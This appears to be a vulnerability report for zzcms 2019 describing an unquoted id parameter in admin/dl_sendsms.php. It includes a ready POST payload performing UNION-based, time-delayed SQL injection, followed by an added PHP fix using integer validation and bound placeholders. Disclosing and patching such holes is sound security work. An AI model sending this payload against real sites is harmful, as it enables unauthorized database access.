zzcms 2019 admin/dl_sendsms.php SQL injection #2

Open
cby234 opened this issue May 20, 2019 · 0 comments

cby234 commented May 20, 2019

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/admin/dl_sendsms.php line 17 ~ 37)

Let's look at the SQL query part

If the index of the "," value is not 0, the SQL will be
(/* if(strpos($id,",")>0) */ => line 32)

"select * from zzcms_dl where saver<>'' and id in (". $id .")"

There is no single quote around the id parameter, so we can inject any SQL into the id parameter.
(Because of the IF condition, we should add a "," at the end of the id parameter value.)

0x02 payload

Give the "POC" value below as POST data to "/admin/dl_sendsms.php"

POC : Union SQL injection

submit23=%E7%BB%99%E6%8E%A5%E6%94%B6%E8%80%85%E5%8F%91%E6%89%8B%E6%9C%BA%E7%9F%AD%E4%BF%A1%E6%8F%90%E9%86%92&pagename=dl_manage.php%3Fb%3D0%26shenhe%3D%26page%3D1&tablename=zzcms_dl&id%5B%5D=1) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(3)-- a,

@cby234 cby234 closed this as completed May 20, 2019
@cby234 cby234 reopened this Jun 1, 2022
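
One way to close the hole reported above, as an added example that is not part of the original issue and not zzcms code: the posted ids are validated as integers and then bound through one placeholder per value instead of being concatenated into the `in (...)` list. The function names, the use of PDO, the in-memory SQLite database and the two-column `zzcms_dl` table are assumptions made for the demo.

```php
<?php
// Added example, not zzcms code. Assumptions: PDO with the SQLite driver, and
// zzcms_dl reduced to the two columns the reported query touches.

/** Accept only decimal integer ids; anything else is rejected outright. */
function normalize_ids($raw): array
{
    // The form posts id[] (an array); a comma-separated string is also accepted.
    $items = is_array($raw) ? $raw : explode(',', (string)$raw);
    $ids = [];
    foreach ($items as $item) {
        $item = is_scalar($item) ? trim((string)$item) : 'invalid';
        if ($item === '') {
            continue;                 // empty element left by a trailing ","
        }
        if (!ctype_digit($item) || strlen($item) > 10) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $ids[] = (int)$item;
    }
    if ($ids === []) {
        throw new InvalidArgumentException('no id supplied');
    }
    return array_values(array_unique($ids));
}

/** The query from the report, with one bound placeholder per id. */
function fetch_dl_rows(PDO $pdo, $raw): array
{
    $ids = normalize_ids($raw);
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $sql = "select * from zzcms_dl where saver<>'' and id in ($marks)";
    $stmt = $pdo->prepare($sql);
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("create table zzcms_dl (id integer primary key, saver text)");
$pdo->exec("insert into zzcms_dl values (1,'alice'),(2,''),(3,'bob')");

var_dump(count(fetch_dl_rows($pdo, ['1', '2', '3'])));  // ids as the form posts them
try {
    fetch_dl_rows($pdo, ['1) union select 1-- a,']);    // constructed non-numeric id
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

The integer check alone would stop this particular input; binding the values as well keeps the query safe if the validation is later loosened or the function is reused elsewhere.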